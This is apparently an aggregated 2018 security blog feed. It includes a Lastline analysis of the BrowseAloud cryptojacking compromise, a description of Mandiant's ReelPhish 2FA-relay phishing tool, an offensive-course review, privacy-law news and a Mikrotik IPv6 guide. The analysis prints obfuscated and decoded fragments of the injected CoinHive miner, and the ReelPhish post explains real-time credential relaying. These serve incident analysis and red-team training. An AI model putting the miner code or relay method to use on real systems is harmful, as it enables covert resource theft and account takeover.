Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites, including the ICO, the NHS, and local councils (for example, Camden in London), had been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites appeared to be affected, subsequent reports included Irish and US websites as well.


Figure 1: BrowseAloud accessibility tool.

While researchers initially considered the possibility of a new vulnerability being exploited at large, Scott Helme ( quickly identified the culprit: a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 

Compromising a third-party tool's JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (here is a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services:

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the web site Camden Council as analyzed by Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making it impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key popped up on Twitter approximately one week ago (; context on this is still not clear, and we will update the blog post as we know more.

As of now (16:34), Texthelp, the company behind BrowseAloud, has removed the JavaScript from its servers (as a preventive measure the browsealoud[.]com domain has also been set to resolve to NXDOMAIN), effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly, how did it happen?

Figure 3: S3 object metadata.

Marco Cova, one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted in an S3 bucket (see Figure 3 above).

In particular, the last-modified time of the ba.js resource showed 2018-02-11T11:14:24, making Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation), it seems possible that the attackers managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately, we cannot pinpoint the exact cause, as we do not have at our disposal all the permissions records for the referenced S3 bucket.

Considering the number of components involved in the average website, it might be concerning that a single compromise managed to affect so many websites. As Scott Helme noted, however, we should be aware that technologies able to thwart this kind of attack already exist: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript file would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers while looking to pay their council tax.
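To make the SRI idea concrete, the integrity value a site pins is just a base64-encoded digest of the script. The sketch below generates one against a local stand-in file (we are not hashing the real ba.js, and the src URL in the resulting tag is a placeholder):

```shell
# Hedged sketch: computing an SRI hash for a script. ba.js here is a local
# stand-in file; the src URL in the resulting tag is a placeholder.
printf 'var x = 1;\n' > ba.js
HASH=$(openssl dgst -sha384 -binary ba.js | openssl base64 -A)
TAG="<script src=\"https://cdn.example.invalid/ba.js\" integrity=\"sha384-${HASH}\" crossorigin=\"anonymous\"></script>"
echo "$TAG"
```

If the file later served from the CDN differs by even one byte, the digest no longer matches and a compliant browser refuses to execute the script, which is exactly what would have stopped the injected CoinHive payload.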

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet-connected “things” at just 8.4 billion in 2017, counting both consumer and business applications. That’s a big number, yes, but a much smaller number than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here


Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Dark Side Ops I & II Review

Dark Side Ops I 

 A really good overview of the class is here

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

I’ll try not to cover what is in Raphael’s article, as it is still applicable, and I am assuming you read it before continuing on.

I really enjoyed the Visual Studio time, building Slingshot and Throwback myself, along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend Slingshot, but I don't think I have enough WinAPI kung fu to do it, and there wasn't enough instruction around the "how" to do it consistently unless you have a strong Windows API background. However, one of the labs consisted of adding load-and-run PowerShell functionality, which allows you to make use of the plethora of PowerShell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class:

The Visual Studio piece can get overwhelming, though it definitely gives you a big taste of (Windows) implant development. The class materials are getting slightly dated in some cases; a refresh might be helpful. More Throwback usage and development would be fun (even as optional labs).


Lab 1 was getting a fresh copy of Slingshot back up and running, then setting up some additional code to do a PowerShell web cradle to get our Slingshot implant up and running on a remote host, similar to how Metasploit web delivery does things.

Lab 2 was doing some DevOps to set up servers, using OpenVPN to tunnel traffic, and adding HTTPS to our Slingshot codebase.

Lab 3 covered some initial access activity (HTA and Chrome plugin exploitation).

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasion, as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or just for people doing response.

Lab 5 was whitelist bypassing.

Lab 6 was doing some profiling via PowerShell and using Slingshot to run checks on the host.

Labs 7-9 were building a kernel rootkit.

Lab 10 was persistence via COM hijacking and hiding our custom DLL in the registry, and Lab 11 was privilege escalation via a custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

I think the set of courses is having a bit of an identity crisis, mostly due to the 2-day format, and would be a much better class as a 5-day. It is heavily development-focused, meaning you spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely suffers a bit due to all the dev time. There was minimal talk around lateral movement, and the whole thing is entirely Windows focused, so no Linux and no OSX. A suggestion to fix the “ops” piece would be to have Dark Side Ops - Dev and Dark Side Ops - Operator courses, where the Dev one is solely developing your implant and the Operator course is solely using the implant you developed (or were provided). The Silent Break team definitely knows their stuff, and a longer class format or switch-up would let them showcase that more effectively.

GDPR Material and Territorial Scopes

The new EU General Data Protection Regulation will enter into force on 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed, and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

Head of Austrian DPA Appointed Chair of Article 29 Working Party

On February 7, 2018, representatives of European Data Protection Authorities (“DPAs”) met in Brussels to appoint the new leader of the current Article 29 Data Protection Working Party (the “Working Party”). Andrea Jelinek, head of the Austrian DPA, was elected to the post and will replace Isabelle Falque-Pierrotin, leader of the French DPA, who has led the Working Party over the past four years.

Jelinek, who ran for the position against the head of the Bulgarian DPA, Ventsislav Karadjov, won by a majority of votes and will assume the role in the coming months.

After the EU GDPR becomes directly applicable on May 25, 2018, the Working Party will be replaced by the new European Data Protection Board, and it is highly likely that Jelinek will be reconfirmed as its inaugural leader.

Austria is one of only two EU member states, the other being Germany, that have fully adapted their national privacy laws to be in line with the GDPR ahead of the May 2018 deadline.

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

FTC Brings Its Thirtieth COPPA Case, Against Online Talent Agency

On February 5, 2018, the Federal Trade Commission (“FTC”) announced its most recent Children’s Online Privacy Protection Act (“COPPA”) case against Explore Talent, an online service marketed to aspiring actors and models. According to the FTC’s complaint, Explore Talent provided a free platform for consumers to find information about upcoming auditions, casting calls and other opportunities. The company also offered a monthly fee-based “pro” service that promised to provide consumers with access to specific opportunities. Users who registered online were asked to input a host of personal information including full name, email, telephone number, mailing address and photo; they also were asked to provide their eye color, hair color, body type, measurements, gender, ethnicity, age range and birth date.

The FTC alleges that Explore Talent collected the same range of personal information from users who indicated they were under age 13 as from other users, and made no attempts to provide COPPA-required notice or obtain parental consent before collecting such information. Once registered, all profiles, including children’s, became publicly visible, and registered adults were able to “friend” and exchange direct private messages with registered children. The FTC alleges that, between 2014 and 2016, more than 100,000 children registered on the site. As part of the settlement, Explore Talent agreed to (1) pay a $500,000 civil penalty (which was suspended upon payment of $235,000), (2) comply with COPPA in the future and (3) delete the information it previously collected from children.

ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest link in security: people. A typical attack captures a victim’s username and password and stores them for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.
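As a concrete illustration of the first flavor, hardware and software tokens commonly implement TOTP (RFC 6238), where each code is an HMAC of the current 30-second time step. Below is a minimal sketch using only Python's standard library; the secret shown is the RFC 6238 test key, not a real credential:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, for_time=None, step=30, digits=6):
    """Compute an RFC 6238 TOTP code (HMAC-SHA1, 30-second time step)."""
    key = base64.b32decode(secret_b32)
    counter = int((time.time() if for_time is None else for_time) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F  # dynamic truncation per RFC 4226
    value = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)

# RFC 6238 test key ("12345678901234567890" in Base32)
SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
print(totp(SECRET, for_time=59))  # 287082 (RFC 6238 test vector)
```

Because the code is derived from the time step, any code an attacker captures is only useful within that brief window, which is precisely the window real-time phishing exploits.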

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.
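The actual implementation lives in the FireEye repository; as a purely hypothetical sketch (the names and structure here are ours, not ReelPhish's), the session bookkeeping described above boils down to mapping each victim's token to per-session state:

```python
import uuid

class SessionTracker:
    """Hypothetical sketch of token-based session state: each phishing-site
    visitor gets a unique token, and the token maps to that victim's
    progress through a multi-page authentication workflow."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        token = uuid.uuid4().hex  # unique per victim
        self._sessions[token] = {"step": 0, "data": {}}
        return token

    def record(self, token, **fields):
        """Store submitted fields (e.g. username/password, then an OTP)
        and advance the session to the next authentication step."""
        state = self._sessions[token]
        state["data"].update(fields)
        state["step"] += 1
        return state["step"]

tracker = SessionTracker()
t = tracker.new_session()
tracker.record(t, username="alice", password="hunter2")
print(tracker.record(t, otp="287082"))  # 2: second step of this victim's workflow
```

Keying everything on the token is what lets a single listener juggle several victims at once, each potentially at a different page of the workflow.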


We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up an SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker’s system. The tool then starts a new web browser instance on the attacker’s system and submits the credentials to the real VPN portal. Figure 1 shows this process in action.

Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaves identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.


Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Singapore PDPC Issues Response to Public Feedback Regarding Data Protection Consultation

On February 1, 2018, the Singapore Personal Data Protection Commission (the “PDPC”) published its response to feedback collected during a public consultation process conducted during the late summer and fall of 2017 (the “Response”). During that public consultation, the PDPC circulated a proposal relating to two general topics: (1) the relevance of two new alternative bases for collecting, using and disclosing personal data (“Notification of Purpose” and “Legal or Business Purpose”), and (2) a mandatory data breach notification requirement. The PDPC invited feedback from the public on these topics.

“Notification of Purpose” as a new basis for an organization to collect, use and disclose personal data.

In its consultation, the PDPC solicited views on “Notification of Purpose” as a possible new basis for data processing. In its Response, the PDPC noted that it intends to amend its consent framework to incorporate the “Notification of Purpose” approach (also called “deemed consent by notification”), which will essentially provide for an opt-out approach.

Under that approach, organizations may collect, use and disclose personal data merely by providing (1) some form of appropriate notice of purpose in situations where there is no foreseeable adverse impact on the data subjects, and (2) a mechanism to opt out. The PDPC will issue guidelines on what would be considered “not likely to have any adverse impact.” The approach will also require organizations to undertake risk and impact assessments to determine any such possible adverse impacts. Where the risk assessments determine a likely adverse impact, the approach may not be used. Also, the “Notification of Purpose” approach may not be used for direct marketing purposes.

The PDPC will not specify how organizations will be required to notify individuals of purpose, and will leave it to organizations to determine the most appropriate method under the circumstances, which might include a general notification on a website or social media page. The notification must, however, include information on how to opt out or withdraw consent from the collection, use or disclosure. The PDPC also said it would provide further guidance on situations where opt-out would be challenging, such as where large volumes of personal data are collected by sensors, for example.

“Legitimate Interest” as a basis to collect, use or disclose personal data.

In its consultation, the PDPC also sought feedback on a proposed “Legal and Business Purpose” ground for processing personal information. In its Response, the PDPC said that based on the feedback, it intends to adopt this concept under the EU term “legitimate interest.” The PDPC will provide guidance on the legal and business purposes that come within the ambit of “legitimate interest,” such as fraud prevention. “Legitimate interest” will not cover direct marketing purposes. The intent behind this ground for processing is to enable organizations to collect, use and disclose personal data in contexts where there is a need to protect legitimate interests that will have economic, social, security or other benefits for the public or a section thereof, and the processing should not be subject to consent. The benefits to the public or a section thereof must outweigh any adverse impacts to individuals. Organizations must conduct risk assessments to determine whether they can meet this requirement. Organizations relying on “legitimate interest” must also disclose this fact and make available a document justifying the organization’s reliance on it.

Mandatory Data Breach Notification

Regarding the 72-hour breach notification requirement it proposed in the consultation, the PDPC acknowledged in its Response that the affected organization may need time to determine the veracity of a suspected data breach incident. Thus, it stated that the time frame for the breach notification obligation only commences when the affected organization has determined that a breach is eligible for reporting. This means that when an affected organization first becomes aware that an information security incident may have occurred, the organization still has time to conduct a digital forensic investigation to determine precisely what has happened, including whether any breach of personal information security has happened at all, before the clock begins to run on the 72-hour breach notification deadline. From that time, the organization must report the incident to the affected individuals and the PDPC as soon as practicable, but still within 72 hours.

The PDPC requires that the digital forensic investigation be completed within 30 days. However, it allows the investigation to continue beyond 30 days if the affected organization has documented reasons why the time taken to investigate was reasonable and expeditious.

Both the Centre for Information Policy and Leadership and Hunton & Williams LLP filed public comments in the PDPC’s consultation.

How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time, more and more ISPs provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD. To be more verbose, that’s DHCPv6 with Prefix Delegation. This allows the ISP to provide you with more than one subnet, which lets you use multiple networks without NAT. And forget about NAT with IPv6 – there is no standardized way to do it, and it would break too much. The idea with PD is also that you can use normal home routers and cascade them, which requires that each router provide a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway, let’s stop with the theory and provide some code. In my case, my provider requires my router to establish a PPPoE tunnel, which provides my router with an IPv4 address automatically. The config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with the following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is “searching…”. The reason for this is that you most likely block incoming connections from the Internet – if you don’t filter, bad boy! :-) You need to allow DHCP replies from the server.

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now you should see something like this

In this case we got a /60 prefix delegated from the ISP, which gives us 16 /64 subnets. The last step is to configure the IP addresses on your internal networks. Yes, you could just statically add the IP addresses, but if the provider changes the subnet after a disconnect, you would need to reconfigure it again. It’s better to configure the router to dynamically assign the delegated IP addresses to the internal interfaces. You just need to call the following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal
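To see why a /60 yields 16 /64 networks (the prefix shortens by 4 bits, and 2^4 = 16), here is a quick check with Python's ipaddress module, using a prefix from the 2001:db8::/32 documentation range as a stand-in for whatever your ISP actually delegates:

```python
import ipaddress

# Stand-in for an ISP-delegated /60 (2001:db8::/32 is the documentation range)
delegated = ipaddress.ip_network("2001:db8:0:10::/60")

subnets = list(delegated.subnets(new_prefix=64))
print(len(subnets))   # 16 /64 networks, one per internal interface/VLAN
print(subnets[0])     # 2001:db8:0:10::/64
print(subnets[-1])    # 2001:db8:0:1f::/64
```

Each `/ipv6 address add from-pool=…` call above effectively hands one of those 16 /64s to an internal interface.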

The following command should show the prefixes currently assigned to the various internal networks:

/ipv6 address print

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

HHS Announces $3.5 Million Settlement with Fresenius Medical Care

On February 1, 2018, the Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced a settlement with dialysis clinic operator, Fresenius Medical Care (“Fresenius”). Fresenius will pay OCR $3.5 million to settle claims brought under Health Insurance Portability and Accountability Act rules, alleging that lax security practices led to five breaches of electronic protected health information.

The breaches, which occurred at Fresenius facilities in Alabama, Arizona, Florida, Georgia and Illinois from February 23 to July 18, 2012, form the basis of OCR’s claims. According to the settlement, these breaches led to the exposure of 521 patients’ health data.

In announcing the settlement, OCR stated that Fresenius “failed to conduct an accurate and thorough risk analysis of potential risk and vulnerabilities to the confidentiality, integrity, and availability” of protected health data at its locations. Although Fresenius did not admit fault in the settlement, the company agreed to complete a risk analysis and risk management plan, update facility access controls, develop an encryption report and update employees on new policies and procedures.

Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss the OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before U.S. government, bypassing Cloudflare using Internet-wide scan data, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

CIPL Submits Comments to Article 29 WP’s Updated BCR Working Documents

On January 18, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its updated Working Documents, which include a table with the elements and principles found in Binding Corporate Rules (“BCRs”) and Processor Binding Corporate Rules (the “Working Documents”). The Working Documents were adopted by the Working Party on October 3, 2017, for public consultation.

In its comments, CIPL recommends several changes or clarifications the Working Party should incorporate in its final Working Documents.

Comments Applicable to Both Controller and Processor BCRs

  • The Working Documents should clarify that, with respect to the BCR application, providing confirmation of assets to pay for damages resulting from a BCR breach by members outside of the EU does not extend to fines under the GDPR. Additionally, the Working Party should clarify that access to sufficient assets, such as a guarantee from the parent company, is sufficient to provide valid confirmation.
  • The Working Documents should confirm that bringing existing BCRs in line with the GDPR requires updating the BCRs in line with the Working Documents and sending the updated BCRs to the respective supervisory authority.
  • The Working Party should clarify that companies currently in the process of BCR approval through a national mutual recognition procedure should be treated the same as fully approved BCRs, and must simply update the BCRs in line with the GDPR.

Comments Applicable to BCR Controllers (“BCR-C”) Only

  • The Working Party should clarify that companies with approved BCR-C do not have to implement additional controller-processor contracts reiterating the processors’ obligations under Article 28(3) of the GDPR with respect to internal transfers between controllers and processors within the same group of companies.
  • The Working Party should also clarify that BCRs only need to include the requirement that individuals benefitting from third-party beneficiary rights be provided with the information required by Articles 13 and 14 of the GDPR. The BCRs do not need to restate the actual elements of these provisions.

Comments Applicable to BCR Processors Only

  • The Working Documents should emphasize that an individual’s authority to enforce the duty of a processor to cooperate with the controller is limited to situations where cooperation is required to allow the individual to exercise their rights or to make a complaint.
  • The Working Party should remove the requirement that processors must open their facilities for audit, and clarify that the completion of questionnaires or the provision of independent audit reports are sufficient to meet the requirements of Article 28(3)(h). Furthermore, the Working Documents should make clear that certifications can be used in accordance with Article 28(5) to demonstrate compliance with Article 28(3)(h).

General BCR Recommendations

  • The Working Party should clarify that BCR-approved companies are deemed adequate and transfers between two BCR-approved companies (either controllers or processors) or transfers from any controller (not BCR-approved) to a BCR-approved controller are permitted.
  • The status for existing and UK-approved BCRs post-Brexit should be clarified, along with the future role of the UK ICO with regard to BCRs and the situation for new BCR applications post-Brexit.
  • The Working Party should highlight the importance of BCR interoperability with other transfer mechanisms, and propose that the EU Commission consider and promote such interoperability through appropriate means and processes.
  • The Working Party should recommend the EU Commission consider third-party BCR approval by approved certification bodies or “Accountability Agents” and/or a self-certified system for BCRs, which would streamline the BCR approval process and facilitate faster processing times.

To read the above recommendations in more detail, along with all of CIPL’s other recommendations on BCRs, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Ten things you may reveal during job interview (Response to Forbes Article)


In continuation of my recent articles on preparing for the interview, and a few pointers to perform better during the interview, I stumbled on an article at Forbes - Ten Things Never, Ever to Reveal in a Job Interview by Liz Ryan. I agree with some of the pointers she voiced, but a few might hurt the employee/employer relationship in the long run or may even be considered borderline unethical. This blog post is an attempt to share my humble opinion from my experience as both an entrepreneur & an employee. Please read it with a pinch of salt, and do share your comments.

As per the Forbes article, the ten things to keep to yourself (with my opinions alongside):

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But, if your firing involved a legal case against you, or something that the new employer may find in a background check or police verification, it's better to come clean at the start than to be embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate who bitches about old colleagues or managers.
    It may only be acceptable to an extent if it resulted in a harassment case and you took the "justifiable" decision to leave the firm based on how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage of negotiating the terms with yourself & don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous, then you might as well give this position a rethink. Pursue a role you are confident you can manage, and don't manipulate the interviewer by showing "confidence" when you have no idea of the role & its responsibilities. Don't express the nervous jitters of the new job, nor be cocky with overconfidence. But be true to yourself and the employer if the assignment is well within your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    It is on the same grounds as being fired from your last job or your relationship with your ex-manager. Choose sensibly, as there's no black & white answer to handling this situation without knowing the complete context. There can be scenarios when you may want to tell the interviewer (example: your old company may well be a client of the new firm, and you may be allocated to that project (TRUE STORY)).

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, this I don't agree with 100%. Being an entrepreneur, I would like my employee or hiring candidate to be straight with me if they have an ongoing commitment or something that might come up. Most companies hire candidates with a few weeks of probation period, and a company may even fire you if you intentionally hid your planned "engagement" from the firm.
    There is a change in the outlook of companies, and they would appreciate it if you keep them in the loop on ongoing personal issues (briefly) so they can expect the right amount of deliverables. Else, your performance and scheduling may well slide off track, which can cause you problems in the long run.

  7. The fact that you're pregnant, unless you are already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status, they may not be able to judge the kind of workload that is "healthy" for you, or know that you have a medical reason for not doing overtime, etc.
    In the 2nd trimester, you have to be careful, and you should tell the employer about your condition. It will not be well appreciated if, a month after joining, you go on maternity leave. I mean, the employer may well have commitments on ongoing projects and deadlines.
    And if you are in the 3rd trimester, I would recommend you enjoy your pregnancy and not stress about looking for a new job, projects and deadlines. You have a much more significant responsibility and a full-time job for a few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer will have their own range of compensation, and the only thing you have to consider is whether that's enough for you, independently of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year and then move, let the employer know. Your relationship with the employer is mutual, and you would expect the same openness from them. What if the employer were closing the office in six months, hired you while hiding that fact, and then let you go? We don't have to lie to each other to hire the perfect person or land the ideal job.

